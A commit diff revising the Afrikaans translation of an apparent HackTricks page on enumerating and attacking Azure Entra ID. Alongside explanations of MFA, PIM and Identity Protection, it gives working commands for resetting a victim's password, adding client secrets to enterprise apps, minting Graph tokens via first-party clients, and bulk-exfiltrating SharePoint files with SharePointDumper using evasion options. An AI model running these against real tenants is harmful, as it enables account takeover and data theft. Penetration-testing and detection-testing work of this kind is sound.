Translated ['', 'src/pentesting-cloud/azure-security/az-services/az-azur

This commit is contained in:
Translator
2026-03-01 20:17:04 +00:00
parent fc6ea1f0fa
commit fe8e226681
3 changed files with 680 additions and 168 deletions
@@ -2,13 +2,13 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basiese Inligting
## Basiese inligting
Azure Active Directory (Azure AD) dien as Microsoft se wolkgebaseerde diens vir identiteit- en toegangsbestuur. Dit speel 'n sleutelrol om werknemers in staat te stel om aan te meld en toegang te kry tot hulpbronne, beide binne en buite die organisasie, insluitend Microsoft 365, die Azure portal, en 'n magdom ander SaaS-toepassings. Die ontwerp van Azure AD fokus op die verskaffing van noodsaaklike identiteitsdienste, veral **verifikasie, magtiging en gebruikersbestuur**.
Azure Active Directory (Azure AD) dien as Microsoft se wolkgebaseerde diens vir identiteit- en toegangbestuur. Dit maak dit moontlik vir werknemers om aan te meld en toegang te kry tot hulpbronne binne en buite die organisasie, insluitend Microsoft 365, die Azure portal, en 'n magdom ander SaaS-toepassings. Die ontwerp van Azure AD fokus op die lewering van noodsaaklike identiteitsdienste, veral insluitend **outentisering, outorisering, en gebruikersbestuur**.
Belangrike kenmerke van Azure AD sluit in **multi-faktor verifikasie** en **voorwaardelike toegang**, tesame met naatlose integrasie met ander Microsoft-sekuriteitsdienste. Hierdie funksies verhoog die veiligheid van gebruikersidentiteite aansienlik en stel organisasies in staat om hul toegangspolisies doeltreffend te implementeer en af te dwing. As 'n fundamentele komponent van Microsoft se wolkdienste-ekosisteem, is Azure AD van kritieke belang vir die wolkgebaseerde bestuur van gebruikersidentiteite.
Belangrike kenmerke van Azure AD sluit **veelfaktor-outentisering** en **voorwaardelike toegang** in, tesame met naatlose integrasie met ander Microsoft sekuriteitsdienste. Hierdie kenmerke verhoog die sekuriteit van gebruikersidentiteite aansienlik en stel organisasies in staat om hul toegangsbeleide effektief te implementeer en af te dwing. As 'n fundamentele komponent van Microsoft se wolkdienste-ekosisteem, is Azure AD deurslaggewend vir die wolkgebaseerde bestuur van gebruikersidentiteite.
## Enumeration
## Enumerasie
### **Verbinding**
@@ -185,11 +185,11 @@ Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
{{#endtab }}
{{#endtabs }}
Wanneer jy **login** via **CLI** in Azure met enige program, gebruik jy 'n **Azure Application** van 'n **tenant** wat aan **Microsoft** behoort. Hierdie Applications, soos diegene wat jy in jou rekening kan skep, **have a client id**. Jy **won't be able to see all of them** in die **allowed applications lists** wat jy in die console kan sien, **but they are allowed by default**.
Wanneer jy via die **CLI** in Azure met enige program **login**, gebruik jy 'n **Azure Application** van 'n **tenant** wat aan **Microsoft** behoort. Hierdie Applications, soos dié wat jy in jou rekening kan skep, **het 'n client id**. Jy sal **nie al hulle kan sien nie** in die **allowed applications lists** wat jy in die console kan sien, **maar hulle is standaard toegelaat**.
Byvoorbeeld, 'n **powershell script** wat **authenticates** gebruik 'n app met client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Selfs al verskyn die app nie in die console nie, kan 'n sysadmin daardie **block that application** toepas sodat gebruikers nie met tools wat via daardie App verbind toegang kan kry nie.
Byvoorbeeld 'n **powershell script** wat **authenticates** gebruik 'n app met client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Selfs al verskyn die app nie in die console nie, kan 'n sysadmin daardie **toepassing blokkeer** sodat gebruikers nie met tools wat via daardie App koppel toegang kan kry nie.
Daar is egter **other client-ids** van applications wat **will allow you to connect to Azure**:
Daar is egter **ander client-ids** van toepassings wat jou **sal toelaat om aan Azure te koppel**:
```bash
# The important part is the ClientId, which identifies the application to login inside Azure
@@ -358,15 +358,15 @@ Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
{{#endtab }}
{{#endtabs }}
#### Verander wagwoord van gebruiker
#### Verander gebruikerswagwoord
```bash
$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText Force
(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password Verbose
```
### MFA & Conditional Access Policies
### MFA & Conditional Access-beleide
Dit word sterk aanbeveel om MFA by elke gebruiker te aktiveer; sommige maatskappye stel dit egter nie in nie, of stel dit as deel van 'n Conditional Access: Daar sal **vereis MFA as** die gebruiker vanaf 'n spesifieke ligging, blaaier of **'n bepaalde voorwaarde** aanmeld. Hierdie beleide, as dit nie korrek gekonfigureer is nie, kan vatbaar wees vir **bypasses**. Kyk:
Dit word sterk aanbeveel om MFA vir elke gebruiker te aktiveer. Sommige maatskappye stel dit egter nie in nie of stel dit dalk met 'n Conditional Access: die gebruiker sal **MFA vereis indien** hy vanaf 'n spesifieke ligging, blaaier of **sekere voorwaarde** aanmeld. Hierdie beleide, indien nie korrek gekonfigureer nie, kan vatbaar wees vir **bypasses**. Kyk:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -483,12 +483,12 @@ Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
#### Voeg gebruiker by groep
Eienaars van die groep kan nuwe gebruikers by die groep voeg.
Eienaars van die groep kan nuwe gebruikers by die groep voeg
```bash
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
> [!WARNING]
> Groepe kan dinamies wees, wat basies beteken dat **as 'n gebruiker sekere voorwaardes vervul, hy by 'n groep gevoeg sal word**. Natuurlik, as die voorwaardes gebaseer is op **eienskappe** wat 'n **gebruiker** kan **beïnvloed**, kan hy hierdie funksie misbruik om **in ander groepe te kom**.\
> Groepe kan dinamies wees, wat basies beteken dat **as 'n gebruiker aan sekere voorwaardes voldoen, sal hy/sy by 'n groep gevoeg word**. Uiteraard, as die voorwaardes gebaseer is op **attribuute** wat 'n **gebruiker** kan **beheer**, kan hy/sy hierdie funksie misbruik om **in ander groepe in te kom**.\
> Kyk hoe om dinamiese groepe te misbruik op die volgende bladsy:
{{#ref}}
@@ -497,7 +497,7 @@ Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
### Service Principals
Vir meer inligting oor Entra ID service principals sien:
For more information about Entra ID service principals check:
{{#ref}}
../az-basic-information/
@@ -598,11 +598,11 @@ Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembersh
{{#endtabs }}
> [!WARNING]
> Die Owner van 'n Service Principal kan sy wagwoord verander.
> Die Owner van 'n Service Principal kan die wagwoord verander.
<details>
<summary>Lys en probeer om 'n client secret by elke Enterprise App te voeg</summary>
<summary>Lys en probeer om 'n client secret vir elke Enterprise App by te voeg</summary>
```bash
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
@@ -707,18 +707,18 @@ Write-Output "Failed to Enumerate the Applications."
```
</details>
### Aansoeke
### Toepassings
Vir meer inligting oor Aansoeke, sien:
Vir meer inligting oor Toepassings kyk:
{{#ref}}
../az-basic-information/
{{#endref}}
Wanneer 'n App gegenereer word, word 2 tipes permissies gegee:
Wanneer 'n App gegenereer word, word 2 tipes Permissions gegee:
- **Permissies** wat aan die **Service Principal** gegee word
- **Permissies** wat die **app** kan hê en **namens die gebruiker** kan gebruik.
- **Permissions** gegee aan die **Service Principal**
- **Permissions** wat die **app** kan hê en gebruik namens die **user**.
{{#tabs }}
{{#tab name="az cli" }}
@@ -771,6 +771,81 @@ az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2Permiss
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
<details>
<summary>Vind alle toepassings met API-permissies vir nie-Microsoft APIs (az cli)</summary>
```bash
#!/usr/bin/env bash
set -euo pipefail
# Known Microsoft first-party owner organization IDs.
MICROSOFT_OWNER_ORG_IDS=(
"f8cdef31-a31e-4b4a-93e4-5f571e91255a"
"72f988bf-86f1-41af-91ab-2d7cd011db47"
)
is_microsoft_owner() {
local owner="$1"
local id
for id in "${MICROSOFT_OWNER_ORG_IDS[@]}"; do
if [ "$owner" = "$id" ]; then
return 0
fi
done
return 1
}
command -v az >/dev/null 2>&1 || { echo "az CLI not found" >&2; exit 1; }
command -v jq >/dev/null 2>&1 || { echo "jq not found" >&2; exit 1; }
az account show >/dev/null
apps_json="$(az ad app list --all --query '[?length(requiredResourceAccess) > `0`].[displayName,appId,requiredResourceAccess]' -o json)"
tmp_map="$(mktemp)"
tmp_ids="$(mktemp)"
trap 'rm -f "$tmp_map" "$tmp_ids"' EXIT
# Build unique resourceAppId values used by applications.
jq -r '.[][2][]?.resourceAppId' <<<"$apps_json" | sort -u > "$tmp_ids"
# Resolve resourceAppId -> owner organization + API display name.
while IFS= read -r rid; do
[ -n "$rid" ] || continue
sp_json="$(az ad sp show --id "$rid" --query '{owner:appOwnerOrganizationId,name:displayName}' -o json 2>/dev/null || true)"
owner="$(jq -r '.owner // "UNKNOWN"' <<<"$sp_json")"
name="$(jq -r '.name // "UNKNOWN"' <<<"$sp_json")"
printf '%s\t%s\t%s\n' "$rid" "$owner" "$name" >> "$tmp_map"
done < "$tmp_ids"
echo -e "appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tresourceOwnerOrgId\tpermissionType\tpermissionId"
# Print only app permissions where the target API is NOT Microsoft-owned.
while IFS= read -r row; do
app_name="$(jq -r '.[0]' <<<"$row")"
app_id="$(jq -r '.[1]' <<<"$row")"
while IFS= read -r rra; do
resource_app_id="$(jq -r '.resourceAppId' <<<"$rra")"
map_line="$(awk -F '\t' -v id="$resource_app_id" '$1==id {print; exit}' "$tmp_map")"
owner_org="$(awk -F'\t' '{print $2}' <<<"$map_line")"
resource_name="$(awk -F'\t' '{print $3}' <<<"$map_line")"
[ -n "$owner_org" ] || owner_org="UNKNOWN"
[ -n "$resource_name" ] || resource_name="UNKNOWN"
if is_microsoft_owner "$owner_org"; then
continue
fi
while IFS= read -r access; do
perm_type="$(jq -r '.type' <<<"$access")"
perm_id="$(jq -r '.id' <<<"$access")"
echo -e "${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${owner_org}\t${perm_type}\t${perm_id}"
done < <(jq -c '.resourceAccess[]' <<<"$rra")
done < <(jq -c '.[2][]' <<<"$row")
done < <(jq -c '.[]' <<<"$apps_json")
```
</details>
{{#endtab }}
{{#tab name="Az" }}
@@ -820,21 +895,21 @@ Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
{{#endtabs }}
> [!WARNING]
> 'n app met die toestemming **`AppRoleAssignment.ReadWrite`** kan homself tot Global Admin eskaleer deur homself die rol te gee.\
> 'n app met die toestemming **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** deur homself die rol toe te ken.\
> Vir meer inligting [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> [!NOTE]
> 'n Geheime string wat die application gebruik om sy identiteit te bewys wanneer dit 'n token versoek, is die application **password**.\
> Dus, as jy hierdie **password** vind kan jy toegang kry as die **service principal** binne die **tenant**.\
> Let wel dat hierdie **password** slegs sigbaar is wanneer dit gegenereer word (jy kan dit verander maar jy kan dit nie weer kry nie).\
> Die **owner** van die **application** kan **add a password** daaraan voeg (sodat hy dit kan impersonate).\
> Aanmeldings as hierdie service principals word **nie as riskant gemerk nie** en hulle **sal nie MFA hê nie.**
> 'n Geheime string wat die application gebruik om sy identiteit te bewys wanneer dit 'n token versoek is die application password.\
> Dus, as jy hierdie **password** vind, kan jy as die **service principal** **inside** die **tenant** toegang kry.\
> Let daarop dat hierdie password slegs sigbaar is wanneer dit gegenereer word (jy kan dit verander maar jy kan dit nie weer kry nie).\
> Die **owner** van die **application** kan **add a password** daaraan (sodat hy dit kan impersonate).\
> Logins as hierdie service principals is **not marked as risky** en hulle **won't have MFA.**
Dit is moontlik om 'n lys van algemeen gebruikte App IDs wat aan Microsoft behoort te vind in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
### Managed Identities
Vir meer inligting oor Managed Identities, kyk:
For more information about Managed Identities check:
{{#ref}}
../az-basic-information/
@@ -852,7 +927,7 @@ az identity list --output table
### Azure Rolle
Vir meer inligting oor Azure-rolle, sien:
Vir meer inligting oor Azure rolle, kyk:
{{#ref}}
../az-basic-information/
@@ -937,9 +1012,9 @@ Headers = @{
{{#endtab }}
{{#endtabs }}
### Entra ID-rolle
### Entra ID Rolle
Vir meer inligting oor Azure-rolle, kyk:
Vir meer inligting oor Azure-rolle kyk:
{{#ref}}
../az-basic-information/
@@ -1100,14 +1175,14 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
{{#endtab }}
{{#endtabs }}
## Microsoft Graph gedelegeerde SharePoint data-exfiltrasie (SharePointDumper)
## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)
Aanvallers met 'n **gedelegeerde Microsoft Graph token** wat **`Sites.Read.All`** of **`Sites.ReadWrite.All`** insluit, kan **sites/drives/items** oor Graph opnoem en dan **lêerinhoud haal** via **SharePoint pre-authentication download URLs** (tydbeperkte URL's met 'n ingebedde toegangstoken). Die [SharePointDumper](https://github.com/zh54321/SharePointDumper) script outomatiseer die volledige vloei (enumeration → pre-auth downloads) en lewer per-versoek telemetrie vir deteksietoetsing.
Aanvallers met 'n **gedelegeerde Microsoft Graph token** wat **`Sites.Read.All`** of **`Sites.ReadWrite.All`** insluit, kan **sites/drives/items** oor Graph opnoem en dan lêerinhoud trek via **SharePoint pre-authentication download URLs** (tyd-beperkte URLs wat 'n access token insluit). Die [SharePointDumper](https://github.com/zh54321/SharePointDumper) skrip outomatiseer die volledige vloei (enumeration → pre-auth downloads) en genereer per-versoek telemetrie vir deteksietoetsing.
### Verkryging van bruikbare gedelegeerde tokens
### Obtaining usable delegated tokens
- SharePointDumper self **authentikeer nie**; verskaf 'n access token (opsioneel 'n refresh token).
- Pre-consented **first-party clients** kan misbruik word om 'n Graph token te mint sonder om 'n app te registreer. Voorbeeld `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) aanroepe:
- SharePointDumper self **authentiseer nie**; voorsien 'n access token (opsioneel 'n refresh token).
- Vooraf-toegestane **first-party clients** kan misbruik word om 'n Graph token te mint sonder om 'n app te registreer. Voorbeeld `Invoke-Auth` (van [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) aanroepe:
```powershell
# CAE requested by default; yields long-lived (~24h) access token
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
@@ -1120,7 +1195,7 @@ Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https
Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
```
> [!NOTE]
> FOCI TRUE kliënte ondersteun refresh oor toestelle; FOCI FALSE kliënte vereis dikwels `-Origin` om reply URL origin validation te bevredig.
> FOCI TRUE clients ondersteun refresh oor toestelle; FOCI FALSE clients vereis dikwels `-Origin` om reply-URL oorsprongvalidasie te bevredig.
### Uitvoering van SharePointDumper vir enumeration + exfiltration
@@ -1128,24 +1203,24 @@ Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
```
- Omvangbeheer: insluit/uitsluit webwerwe of uitbreidings en globale limiete:
- Omvangbeheer: sluit werwe of uitbreidings in/uit en globale perke:
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
```
- **Resume** onderbroke runs (re-enumerates, maar slaan afgelaaide items oor):
- **Hervat** onderbroke uitvoerings (heropnoem, maar slaan afgelaaide items oor):
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
```
- **Outomatiese token-hernuwing by HTTP 401** (vereis EntraTokenAid gelaai):
- **Outomatiese token refresh by HTTP 401** (vereis dat EntraTokenAid gelaai is):
```powershell
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
```
Operasionele notas:
- Voorkeur vir **CAE-enabled** tokens om mid-run verval te voorkom; herlaaipogings word **nie** in die hulpmiddel se API-log aangeteken nie.
- Genereer **CSV/JSON request logs** vir **Graph + SharePoint** en maskeer ingebedde SharePoint download tokens standaard (skakelbaar).
- Ondersteun **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, en **Ctrl+C-safe shutdown** vir verkeersvorming tydens detectie/IR-toetse.
- Gee voorkeur aan **CAE-enabled** tokens om mid-run verstryking te voorkom; verfrissingpogings word **nie** in die tool se API log ingeskryf nie.
- Genereer **CSV/JSON request logs** vir **Graph + SharePoint** en redigeer standaard ingeslote SharePoint download tokens (skakelbaar).
- Ondersteun **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, en **Ctrl+C-safe shutdown** vir traffic shaping tydens detection/IR tests.
## Entra ID Privilege Escalation
@@ -1163,28 +1238,29 @@ Operasionele notas:
### Privileged Identity Management (PIM)
Privileged Identity Management (PIM) in Azure help om te voorkom dat gebruikers onnodig buitensporige voorregte toegeken word.
Privileged Identity Management (PIM) in Azure help om te **voorkom dat oormatige regte onnodig aan gebruikers toegewys word**.
Een van die hoofkenmerke van PIM is dat dit toelaat om rolle nie aan principals wat konstant aktief is toe te ken nie, maar om hulle vir 'n bepaalde tydperk kwalifiseerbaar te maak (bv. 6 maande). Wanneer die gebruiker die rol wil aktiveer, moet hy daarvoor vra en die tyd aandui wat hy die voorreg benodig (bv. 3 uur). Dan moet 'n admin die versoek goedkeur. Let wel: die gebruiker kan ook vra om die tyd te verleng.
Een van die hoofkenmerke wat deur PIM verskaf word, is dat dit toelaat om rolle nie permanent aan principals toe te ken nie, maar hulle **in aanmerking te laat kom vir 'n tydperk (e.g. 6months)**. Wanneer die gebruiker daardie rol wil aktiveer, moet hy daarvoor vra en die tyd aandui waarvoor hy die reg benodig (e.g. 3 hours). Dan moet 'n **admin die versoek goedkeur**.\
Let daarop dat die gebruiker ook kan vra om die tyd te **verleng**.
Verder stuur PIM e-posse wanneer 'n privileged role aan iemand toegeken word.
Boonop stuur **PIM e-posse** wanneer 'n bevoorregte rol aan iemand toegeken word.
<figure><img src="../../../images/image (354).png" alt=""><figcaption></figcaption></figure>
Wanneer PIM aangeskakel is, is dit moontlik om elke rol met sekere vereistes te konfigureer, soos:
- Maksimum duur (ure) van aktivering
- Maksimum duur (hours) van aktivering
- Vereis MFA by aktivering
- Vereis Conditional Access authentication context
- Vereis regverdiging by aktivering
- Vereis ticket-inligting by aktivering
- Vereis motivering by aktivering
- Vereis ticket information by aktivering
- Vereis goedkeuring om te aktiveer
- Maksimum tyd waarna die kwalifiserende toewysings verval
- Baie meer konfigurasie oor wanneer en aan wie kennisgewings gestuur moet word wanneer sekere aksies met daardie rol gebeur
- Max time to expire the eligible assignments
- Baie meer konfigurasie oor wanneer en aan wie kennisgewings gestuur word wanneer sekere handelinge met daardie rol plaasvind
### Conditional Access Policies
Sien:
Kyk:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -1192,26 +1268,27 @@ Sien:
### Entra Identity Protection
Entra Identity Protection is 'n sekuriteitsdiens wat toelaat om te detect wanneer 'n gebruiker of 'n sign-in te riskant is om te aanvaar, en om die gebruiker of die sign-in poging te block.
Entra Identity Protection is 'n sekuriteitsdiens wat toelaat om te **ontdek wanneer 'n gebruiker of 'n sign-in te riskant is** om te aanvaar, wat dit moontlik maak om die gebruiker of die sign-in poging te **blokkeer**.
Dit stel die admin in staat om dit te konfigureer om pogings te blokkeer wanneer die risiko "Low and above", "Medium and above" of "High" is. Alhoewel, standaard is dit heeltemal "disabled":
Dit laat die admin toe om dit te konfigureer om pogings te **blokkeer** wanneer die risiko "Low and above", "Medium and above" of "High" is. Nietemin, standaard is dit heeltemal **disabled**:
<figure><img src="../../../images/image (356).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Tans word dit aanbeveel om hierdie beperkings via Conditional Access-beleide by te voeg waar dieselfde opsies gekonfigureer kan word.
> Tans word aanbeveel om hierdie beperkings via Conditional Access policies by te voeg waar dit moontlik is om dieselfde opsies te konfigureer.
### Entra Password Protection
Entra Password Protection ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is 'n sekuriteitsfunksie wat help om die misbruik van swak wagwoorde te voorkom deur rekeninge te sluit wanneer verskeie onsuksesvolle aanmeldpogings plaasvind. Dit laat ook toe om 'n pasgemaakte wagwoordlys te verbied wat jy moet voorsien.
Entra Password Protection ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is 'n sekuriteitsfunksie wat help om die misbruik van swak wagwoorde te voorkom deur rekeninge te sluit wanneer verskeie onsuksesvolle aanmeldpogings plaasvind.\
Dit laat ook toe om 'n pasgemaakte wagwoordlys te **verbied** wat jy moet verskaf.
Dit kan toegepas word beide op die cloudvlak en op on-premises Active Directory.
Dit kan **beide** op cloudvlak en on-premises Active Directory toegepas word.
Die standaardmodus is **Audit**:
<figure><img src="../../../images/image (355).png" alt=""><figcaption></figcaption></figure>
## References
## Verwysings
- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
- [SharePointDumper](https://github.com/zh54321/SharePointDumper)